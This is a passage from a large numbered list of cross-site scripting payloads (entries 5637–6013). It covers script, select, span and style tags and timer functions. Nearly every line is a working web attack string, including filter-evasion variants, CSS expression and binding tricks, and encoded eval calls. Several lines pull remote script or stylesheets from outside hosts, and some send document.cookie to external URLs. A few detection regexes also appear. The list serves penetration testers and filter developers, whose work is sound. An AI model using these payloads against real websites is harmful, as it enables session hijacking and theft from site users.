  5637. <script>window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
  5638. ←’<script>window.confirm(1)</script> — !>
  5639. `’”><script>window[‘log*chr*’](*num*)</script>
  5640. ‘<script>window.onload=function(){document.forms[0].message.value=’1';}</script>
  5641. <script>window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
  5642. <script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
  5643. <script>write(a?<img/src=//xss.cx/?a?+cookie.replace(/\s/g,””)+a?>a?)></script>
  5644. <script\x00>alert(1)</script>
  5645. <script>/* *\x00/javascript:alert(1)// */</script>
  5646. <script\x00>javascript:alert(1)</script>
  5647. “`’><script>\x00javascript:alert(1)</script>
  5648. <script\x09>javascript:alert(1)</script>
  5649. “`’><script>\x09javascript:alert(1)</script>
  5650. <script\x09type=”text/javascript”>javascript:alert(1);</script>
  5651. <script\x0A>javascript:alert(1)</script>
  5652. “`’><script>\x0Ajavascript:alert(1)</script>
  5653. <script\x0Atype=”text/javascript”>javascript:alert(1);</script>
  5654. “`’><script>\x0Bjavascript:alert(1)</script>
  5655. <script\x0C>javascript:alert(1)</script>
  5656. “`’><script>\x0Cjavascript:alert(1)</script>
  5657. <script\x0Ctype=”text/javascript”>javascript:alert(1);</script>
  5658. <script\x0D>javascript:alert(1)</script>
  5659. “`’><script>\x0Djavascript:alert(1)</script>
  5660. <script\x0Dtype=”text/javascript”>javascript:alert(1);</script>
  5661. <script\x20>javascript:alert(1)</script>
  5662. “`’><script>\x20javascript:alert(1)</script>
  5663. <script\x20type=”text/javascript”>javascript:alert(1);</script>
  5664. “`’><script>\x21javascript:alert(1)</script>
  5665. <script>/* *\x2A/javascript:alert(1)// */</script>
  5666. “`’><script>\x2Bjavascript:alert(1)</script>
  5667. <script\x2F>javascript:alert(1)</script>
  5668. ‘“`><script>/* *\x2Fjavascript:alert(1)// */</script>
  5669. <script\x2Ftype=”text/javascript”>javascript:alert(1);</script>
  5670. “`’><script>\x3Bjavascript:alert(1)</script>
  5671. <script\x3Etype=”text/javascript”>javascript:alert(1);</script>
  5672. “`’><script>\x7Ejavascript:alert(1)</script>
  5673. <script/x>alert(1)</script>
  5674. <script x> alert(1) </script 1=2
  5675. <script>!{x(){alert(1)}}.x()</script>
  5676. <script x> alert</script 1=2
  5677. <script x>alert(‘XSS’)<script y>
  5678. “><script x=#”async=#”src=”//a?a?L
  5679. “`’><script>\xC2\x85javascript:alert(1)</script>
  5680. “`’><script>\xC2\xA0javascript:alert(1)</script>
  5681. <script>x=”confirm(1)”.replace(/.+/,eval)//”</script>
  5682. <script x> confirm(1) </script 1=2
  5683. “/><script x> confirm(1) </script 1=2
  5684. <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
  5685. <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
  5686. <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
  5687. <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
  5688. “`’><script>\xE1\x9A\x80javascript:alert(1)</script>
  5689. “`’><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
  5690. “`’><script>\xE2\x80\x80javascript:alert(1)</script>
  5691. “`’><script>\xE2\x80\x81javascript:alert(1)</script>
  5692. “`’><script>\xE2\x80\x82javascript:alert(1)</script>
  5693. “`’><script>\xE2\x80\x83javascript:alert(1)</script>
  5694. “`’><script>\xE2\x80\x84javascript:alert(1)</script>
  5695. “`’><script>\xE2\x80\x85javascript:alert(1)</script>
  5696. “`’><script>\xE2\x80\x86javascript:alert(1)</script>
  5697. “`’><script>\xE2\x80\x87javascript:alert(1)</script>
  5698. “`’><script>\xE2\x80\x88javascript:alert(1)</script>
  5699. “`’><script>\xE2\x80\x89javascript:alert(1)</script>
  5700. “`’><script>\xE2\x80\x8Ajavascript:alert(1)</script>
  5701. “`’><script>\xE2\x80\x8Bjavascript:alert(1)</script>
  5702. “`’><script>\xE2\x80\xA8javascript:alert(1)</script>
  5703. “`’><script>\xE2\x80\xA9javascript:alert(1)</script>
  5704. “`’><script>\xE2\x80\xAFjavascript:alert(1)</script>
  5705. “`’><script>\xE2\x81\x9Fjavascript:alert(1)</script>
  5706. “`’><script>\xE3\x80\x80javascript:alert(1)</script>
  5707. “`’><script>\xEF\xBB\xBFjavascript:alert(1)</script>
  5708. “`’><script>\xEF\xBF\xAEjavascript:alert(1)</script>
  5709. “`’><script>\xEF\xBF\xBEjavascript:alert(1)</script>
  5710. “`’><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
  5711. <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
  5712. <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
  5713. <script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script>
  5714. <script xmlns=”http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
  5715. <_:script xmlns:_=”hxxp://www.w3.org/1999/xhtml">alert(65)</_:script>
  5716. <script>x=new ActiveXObject(“WScript.Shell”);x.run(‘calc’);</script>
  5717. <script>x=new class extends Function{}(‘alert(1)’); x=new x;</script>
  5718. </script><x ng-app ng-csp>{{constructor.constructor(‘alert(1)’)()}}
  5719. <script>x=””^prompt(9)^””;y=42;</script>
  5720. <script>x=””<<prompt(9)<<””;y=42;</script>
  5721. <script>x=””<=prompt(9)<=””;y=42;</script>
  5722. <script>x=””<prompt(9)<””;y=42;</script>
  5723. <script>x=””===prompt(9)===””;y=42;</script>
  5724. <script>x=””==prompt(9)==””;y=42;</script>
  5725. <script>x=””>=prompt(9)>=””;y=42;</script>
  5726. <script>x=””>>>prompt(9)>>>””;y=42;</script>
  5727. <script>x=””>>prompt(9)>>””;y=42;</script>
  5728. <script>x=””>prompt(9)>””;y=42;</script>
  5729. <script>x=””||prompt(9)||””;y=42;</script>
  5730. <script>x=””|prompt(9)|””;y=42;</script>
  5731. <script>x=””-prompt(9)-””;y=42;</script>
  5732. <script>x=””!=prompt(9)!=””;y=42;</script>
  5733. <script>x=””?prompt(9):””;y=42;</script>
  5734. <script>x=””/prompt(9)/””;y=42;</script>
  5735. <script>x=””*prompt(9)*””;y=42;</script>
  5736. <script>x=””&&prompt(9)&&””;y=42;</script>
  5737. <script>x=””&prompt(9)&””;y=42;</script>
  5738. <script>x=””%prompt(9)%””;y=42;</script>
  5739. <script>x=””+prompt(9)+””;y=42;</script>
  5740. <script>x=’<%’</script> %>/alert(2)</script>
  5741. <ScRIPT x src=//0x.lv?
  5742. <SCRIPT/XSS id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
  5743. <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"></SCRIPT>
  5744. <;SCRIPT/XSS SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  5745. <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5746. <SCRIPT/XSSSRC=”http://host"></SCRIPT>
  5747. <SCRIPT/XSS SRC=”http://xss.cx/xss.js"></SCRIPT>
  5748. <SCRIPT/XSS SRC=”http://xss.rocks/xss.js"></SCRIPT>
  5749. <script>z=’document.’</script>
  5750. <script>z=document.</script>
  5751. <script>z=+write(“</script>
  5752. <script>z=z+’js></sc’</script>
  5753. <script>z=z+’.net/1.’</script>
  5754. <script>z=z+’ript>”)’</script>
  5755. <script>z=z+<script</script>
  5756. <script>z=z+’<script’</script>
  5757. <script>z=z+’ src=ht’</script>
  5758. <script>z=z+’tp://ww’</script>
  5759. <script>z=z+’write(“‘</script>
  5760. <script>z=z+’w.shell’</script>
  5761. “><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>
  5762. <scri\x00pt>alert(1);</scri%00pt>
  5763. <Scri \ x00pt> alert (1); </ scri% 00pt>
  5764. <scri\x00pt>confirm(1);</scri%00pt>
  5765. </Scrpt/”%27 — !>%20<Scrpt>%20confirm(1)%20</Scrpt>
  5766. <SCR?PT>alert(181)</SCR?PT>
  5767. <SCR?PT>alert(41)</SCR?PT>
  5768. <SCR?PT/SRC=data:,alert(182)>
  5769. <SCR?PT/SRC=data:,alert(42)>
  5770. <scr<script>ipt>alert(0x000123)</script>
  5771. \”><scr<script>ipt>alert(0x000123)</script>
  5772. <scr<script>ipt>alert(0x000123)</scr</script>ipt>
  5773. \”<scr<script>ipt>alert(0x000123)</scr</script>ipt>
  5774. <;scrscriptipt>;alert(1)<;/scrscriptipt>;
  5775. <scr<script>ipt>alert(1)</scr</script>ipt>
  5776. <scr<script>ipt>alert(1)</scr<script>ipt>
  5777. <scrscriptipt>alert(1)</scrscriptipt>
  5778. <scrscriptipt>alert(1)</scrscriptipt>
  5779. <sCR<script>iPt>alert(1)</SCr</script>IPt>
  5780. <scr<script>ipt>alert(1)</scr<script>ipt>F
  5781. <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
  5782. <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  5783. <scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>
  5784. <scr<script>ipt>alert(/Xss/)</scr</script>ipt>
  5785. <scr<script>ipt>alert(‘XSS’)</scr</script>ipt>
  5786. <scr<script>ipt>alert(‘XSS’)</scr<script>ipt>
  5787. <scr<script>ipt>alert(‘XSS’);</scr</script>ipt>
  5788. <scr<script>ipt>alert(“XSS”)</scr<script>ipt>
  5789. </scr</script>ipt><ifr<iframeame/onload=prompt()>whs
  5790. <scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
  5791. <scr<script>rip>alalertert</scr</script>rip>
  5792. <sc<script>ript>alert(123)</sc</script>ript>
  5793. <sc<script>ript>alert(1)</script>
  5794. <select autofocus onfocus=alert`1`
  5795. <select autofocus onfocus=alert(1)>
  5796. <select autofocus onfocus=alert(1)>//INJECTX
  5797. <select id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><select onchange=alert(1)><option>1<option>2
  5798. <select onchange=alert(106)><option>1<option>2
  5799. <select onchange=alert(1)><option>1<option>2
  5800. <select onclick=”popup=1;”>
  5801. <select onclick=popup=1;>
  5802. ‘></select><script>alert(123)</script>
  5803. ‘></select><script>alert(123)</script>
  5804. ‘></select><script>alert(XSS)</script>
  5805. <set attributeName=”onmouseover” to=”alert(1)”/>
  5806. <set attributeName=”xlink:href” to=”javascript:alert(1)” begin=”1s” />
  5807. Set.constructor(‘ale’+’rt(13)’)();
  5808. Set.constructor`alert\x28document.domain\x29```
  5809. Set.constructor`al\x65rt\x2814\x29```;
  5810. setImmediate()
  5811. setinterval()
  5812. setInterval(‘ale’+’rt(10)’);
  5813. setInterval`alert\x28document.domain\x29`
  5814. setInterval(code, 0)
  5815. setInterval(‘location.hash=”??????????”[i++%10]’,i=99)
  5816. setInterval(location.search.slice(1));
  5817. setInterval(x,5000);
  5818. setTimeout()
  5819. setTimeout`alert(1);//${1000}`
  5820. setTimeout(‘ale’+’rt(2)’);
  5821. setTimeout([‘alert(/@garethheyes/)’]);
  5822. setTimeout`alert\x28document.domain\x29`
  5823. setTimeout([‘confirm(4)’]);
  5824. setTimeout(location)
  5825. setTimeout(location.search.slice(1));
  5826. setTimeout// (name// ,0)
  5827. setTimeout(URL.slice(-7))//#alert()
  5828. <<! — #set var=”x” value=”svg onload=alert(54)” →<! — #echo var=”x” →>
  5829. <ShowAbout>1</ShowAbout>
  5830. <ShowDuration>1</ShowDuration>
  5831. <ShowElapsedTime>1</ShowElapsedTime>
  5832. <ShowFFRW>1</ShowFFRW>
  5833. <ShowLoadingMov>1</ShowLoadingMov>
  5834. Single Input (script-based)
  5835. ?skinName=asfunction:getURL,javascript:alert(1)//”,
  5836. /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
  5837. /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
  5838. <slideslow><image img=javascript:alert(XSS@%2Bdocument.domain caption= /></slideshow>
  5839. <s[NULL]cript>confirm(1)</s[NULL]cript>’>Clickme</a>
  5840. ;&sol;script&gt;
  5841. <s/onclick=alert()>b
  5842. source+location.hash[1]+1+location.hash[2]>#()
  5843. source+location.hash.substr(1)>#(1)
  5844. <source onclick=popup=1; ><frameset/onload=popup=1;>
  5845. {“source”:{},”__proto__”:{“source”:”$`onerror=prompt(1)>”}}
  5846. <source srcset=”x”><img onerror=”confirm(5)”></picture>
  5847. Space Insertion##<script%20TEST>alert(1)</script%20TESTTEST>
  5848. <span class=”pln”></span><span class=”tag”>&lt;formaction</span><span class=”pun”>=</span><span class=”atv”>&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class=”tag”>&gt;&lt;button&gt;</span><span class=”pln”>CLICK</span>
  5849. <span class=”pln”> </span><span class=”tag”>&lt;formaction</span><span class=”pun”>=</span><span class=”atv”>&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class=”tag”>&gt;&lt;button&gt;</span><span class=”pln”>CLICK</span>
  5850. <span class=”qm_ico_print” id=”mail_print” title=”L” onclick=”window.open(‘/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&amp’);”></span>
  5851. <SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)>test</SPAN>
  5852. <span class=”xmsw” title=”dd” onmouseout=window.location=’http://test/test.php?c='+document.cookie>test</span>
  5853. <SPAN class=xmsw title=dd onmouseout=window.location=’http://www,xfydyt.com'>test</span>
  5854. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  5855. <SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  5856. <span id=”x” data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>
  5857. <span onclick=”javascript:changeFont(2);”>
  5858. <span/onmouseover=confirm(1)>renwax23
  5859. “></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
  5860. <SPAN “ style=”display: block; position: absolute; top: 0; left: 0; width: 9999px; height: 9999px; z-index: 9999" foo=”></span>renwax23
  5861. SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  5862. ‘/src=[^<]*base64[^<]*(?=\>)/Uis’,
  5863. “src=data:,alert%2823%29></script><script x=”
  5864. SRC’” →<! — #exec cmd=”/bin/echo
  5865. src=”http://www.site.com/XSS.js"></script>
  5866. src=”http://www.site.com/XSS.js"></script>
  5867. <sRCIpt>alert(/123/)</ScRpT>
  5868. src=JaVaSCript:prompt(132)
  5869. <s<script>cript>…</s</script>cript>
  5870. [S] = stripped char or string
  5871. sstyle=foobar”tstyle=”foobar”ystyle=”foobar”lstyle=”foobar”estyle=”foobar”=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=”
  5872. {!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
  5873. stop, open, print && confirm(1)
  5874. String.fromCharCode(0x61,0x62)
  5875. String.fromCharCode(0xffff+0x3d)
  5876. (String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41))
  5877. String.raw(a=alert(1),1,2)
  5878. String.raw`jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e`;
  5879. <% string str_a = rrequest.getParameter(“a”);%>
  5880. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  5881. </style &#32;><script &#32; :-(>/**/confirm(document.location)/**/</script &#32; :-(
  5882. “+style%3d”x%3aexpression(alert(1))+
  5883. <STYLE>a{background:url(‘s1’ ‘s2)}@import javascript:javascript:alert(1);’);}</STYLE>
  5884. /style=a:expression&#40&#47&#42'/-
  5885. <STYLE><! — a{< img src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>} →</style></DIV>
  5886. <STYLE> a { width: expression(alert(‘XSS’)) } </STYLE>
  5887. <style>*{background-image:url(‘\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29’)}</style><% style=behavior:url(: onreadystatechange=alert(1)>
  5888. <style>body:after{content: ��\61\6c\65\72\74\28\31\29��}</style><script>eval(eval(document.styleSheets[0].cssRules[0].style.content))</script>
  5889. <style>body{background-color:expression\(alert(1))}</style>
  5890. <style>body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }</style>
  5891. <style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo “<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead…<hr />”; phpinfo(); __halt_compiler(); ?></h1>
  5892. <;STYLE>;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
  5893. <STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  5894. <style>BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss")}</style>
  5895. <STYLE>BODY{-moz-binding:url(“http://xxxx.com/xssmoz.xml#xss")}</STYLE>
  5896. <style>body{width:��xpression(parent.document.write(unescape(‘%3Cscript%20src%3Dhttp%3A//xssor.io/phishing/%3E%3C/script%3E’)));}</style>
  5897. style=color: expression(alert(0));” a=”
  5898. /style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
  5899. /style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis
  5900. ‘/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis’,
  5901. <style>*{font-family:’Serif}’;x[value=expression(confirm(URL=1));]{color:red}</style>
  5902. <style>img{background-image:url(‘javascript:alert(location)’)}</style>
  5903. <style><img src=”</style><img src=x “><object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
  5904. <style><img src=”</style><img src=x onerror=alert(1)//”>
  5905. <style><img src=”</style><img src=x onerror=alert(123)//”>
  5906. “<style><img src=’</style><img src=x onerror=alert(“document.cookie”)//’>
  5907. <style><img src=”</style><img src=x onerror=alert(XSS)//”>
  5908. <style><img src=”</style><img src=x onerror=javascript:alert(1)//”>
  5909. <style>@import ‘//attacker/test.css’</style>
  5910. <STYLE>@import’%(css)s’;</STYLE>
  5911. <style>*[{}@import’%(css)s?]</style>X
  5912. <style>@import “data:,*%7bx:expression(javascript:alert(1))%7D”;</style>
  5913. <style>@import “data:,*%7bx:expression(write(1))%7D”;</style>
  5914. <style>@import//evil? >>>steal me!<<< scriptless
  5915. <;STYLE>;@import’;http://ha.ckers.org/xss.css';;<;/STYLE>;
  5916. <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE>
  5917. <STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>;
  5918. <STYLE>@import’http://host/css';</STYLE>
  5919. <style>@import’http://www.securitycompass.com/xss.css';</style>
  5920. <STYLE>@import’http://xss.cx/xss.css';</STYLE>
  5921. <STYLE>@import’http://xxxx.com/xss.css';</STYLE>
  5922. <STYLE>@importjavasc ipt:alert(“XSS”);</STYLE>
  5923. <STYLE>@im\port’\ja\vasc\ript:alert(“X3SS”)’;</STYLE>
  5924. <style>@im\port’\ja\vasc\ript:alert(“xss”)’;</style>
  5925. <style>@import javascript:alert(xss);</style>
  5926. <style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style>
  5927. <style>@import’javascript:alert(“XSS”)’;</style>
  5928. <;STYLE>;@im\port’;\ja\vasc\ript:alert(“;XSS”;)’;;<;/STYLE>;
  5929. <STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>
  5930. <STYLE>@import’javascript:alert(“XSS”)’;</STYLE>
  5931. “><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>
  5932. “><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>>”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
  5933. <STYLE>@im\port’\ja\vasc\ript:confirm(document.location)’;</STYLE>
  5934. “><STYLE>@import”javascript:confirm(document.location)”;</STYLE>
  5935. <style>@im\port’\ja\vasc\ript:document.vulnerable=true’;</style>
  5936. <style>*[{}@import’test.css?]{color: green;}</style>X
  5937. <style>@imp\ort url(“http://attacker.org/malicious.css");</style>
  5938. <style>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
  5939. <style>@keyframes x{}</style>
  5940. <style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
  5941. <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116&grave;1&grave;> %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E “</script><script>alert(String.fromCharCode(88,83,83))</script> <IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”> <IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
  5942. <STYLE>li+{list-style-image:url(“javascript:alert(1)”);}</STYLE><UL><LI>1
  5943. <;STYLE>;li {list-style-image: url(“;javascript:alert(&#39;XSS&#39;)”;);}<;/STYLE>;<;UL>;<;LI>;XSS
  5944. <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’);</STYLE><UL><LI>XSS
  5945. <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
  5946. <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
  5947. <STYLE>li {list-style-image: url(“javascript:alert(XSS)”);}</STYLE><UL><LI>XSS
  5948. <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS
  5949. <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br>
  5950. <style>li {list-style-image: url(“javascript:document.vulnerable=true;”);</STYLE><UL><LI>XSS
  5951. <STYLE>li {list-style-image: url(“javascript:javascript:alert(1)”);}</STYLE><UL><LI>XSS
  5952. <style/>&lt;/style&gt;&lt;img src=1 onerror=confirm(1)&gt;</style>
  5953. style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=”
  5954. <style>*{-o-link:’data:text/html,<svg/onload=confirm(5)>’;-o-link-source:current}</style><a href=1>aaa
  5955. <style/onload=confirm(1)>
  5956. <style/onload = !-confirm&#x28;1&#x29;>
  5957. <style onload=’execScript(“InputBox+1”,”VbScript”);’>
  5958. <style/onload=”javascript:if(‘[object Object]’=={}&&1==[1])confirm(1);”>
  5959. <style/onload=&lt;! — &#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  5960. <style/onload=&lt;! — &#09;&gt;&#10;confirm&#10;&lpar;1&rpar;>
  5961. <style/onload=&lt;! — &gt; alert &lpar;1&rpar;>
  5962. <style/onload=prompt&#40;’&#88;&#83;&#83;’&#41;
  5963. <style/onload=prompt(‘XSS’)
  5964. <style onLoad style onLoad=”javascript:javascript:alert(1)”></style onLoad>
  5965. <style onreadystatechange=javascript:javascript:alert(1);></style>
  5966. <style onReadyStateChange style onReadyStateChange=”javascript:javascript:alert(1)”></style onReadyStateChange>
  5967. <style>p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
  5968. <style>p[foo=bar{}*{-o-link:’javascript:confirm(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
  5969. <style>p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red};</style>
  5970. }</style><script>a=eval;b=alert;a(b(/i/.source));</script>
  5971. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  5972. </style><script>a=eval;b=alert;a(b(/XSS/.source));</script><script>a=eval;b=alert;a(b(/XSS/.source));</script>’”><marquee><h1>XSS by vuolent python</h1></marquee>
  5973. </style ><script :-(>/**/alert(document.location)/**/</script :-(
  5974. </style></script><script>alert(0x000123)</script>
  5975. ‘</style></script><script>alert(0x000123)</script>
  5976. ‘\” →</style></script><script>alert(0x000123)</script>
  5977. \”></style></script><script>alert(0x000123)</script>
  5978. \”>’</style></script><script>alert(0x000123)</script>
  5979. </style></scRipt><scRipt>alert(1)</scRipt>
  5980. ‘“ →</style></scRipt><scRipt>alert(‘XSSPOS ED’)</scRipt>
  5981. “ →</style></script><script>alert(“XSS”)</script>
  5982. <///style///><span %2F onmousemove=’alert&lpar;1&rpar;’>SPAN
  5983. <///style///><span %2F onmousemove=’confirm&lpar;1&rpar;’>SPAN
  5984. <style><! — </style><script>alert(‘XSS’);// →</script>
  5985. <style><! — </style><script>document.vulnerable=true;// →</script>
  5986. <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  5987. <style></style\x09<img src=”about:blank” onerror=javascript:alert(1)//></style>
  5988. <style></style\x0A<img src=”about:blank” onerror=javascript:alert(1)//></style>
  5989. <style></style\x0D<img src=”about:blank” onerror=javascript:alert(1)//></style>
  5990. <style></style\x20<img src=”about:blank” onerror=javascript:alert(1)//></style>
  5991. <style></style\x3E<img src=”about:blank” onerror=javascript:alert(1)//></style>
  5992. <style>//<! — </style> →*{x:expression(alert(/@jackmasa/))}//<style></style>
  5993. <style>//<! — </style> →*{x:expression(confirm(4))}//<style></style>
  5994. <style>#test{x:expression(alert(/XSS/))}</style>
  5995. </stYle/</titLe/</teXtarEa/</scRipt/ — !>
  5996. <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘X7SS’)”)}</STYLE>
  5997. <;STYLE type=”;text/css”;>;BODY{background:url(“;javascript:alert(‘;XSS’;)”;)}<;/STYLE>;
  5998. <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  5999. <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  6000. <STYLE type=”text/css”>BODY{background:url(“javascript:alert(XSS)”)}</STYLE>
  6001. <STYLE type=”text/css”>BODY{background:url(“javascript:confirm(document.location)”)}</STYLE>
  6002. <style type=”text/css”>BODY{background:url(“javascript:document.vulnerable=true”)}</style>
  6003. <STYLE type=”text/css”>BODY{background:url(“javascript:javascript:alert(1)”)}</STYLE>
  6004. <style type=text/css>@import url(http://www.xxx.com/xss.css);</style>
  6005. <STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘X6SS’)”);}</STYLE><A CLASS=XSS></A>
  6006. <STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
  6007. <STYLE TYPE=”text/javascript”>alert(‘X4SS’);</STYLE>
  6008. <STYLE TYPE=”text/javascript”>alert(“XSS”)
  6009. <;STYLE TYPE=”;text/javascript”;>;alert(‘;XSS’;);<;/STYLE>;
  6010. <STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE>
  6011. <STYLE TYPE=”text/javascript”>alert(XSS);</STYLE>
  6012. <STYLE TYPE=”text/javascript”>confirm(document.location);</STYLE>
  6013. <style type=”text/javascript”>document.vulnerable=true;</style>
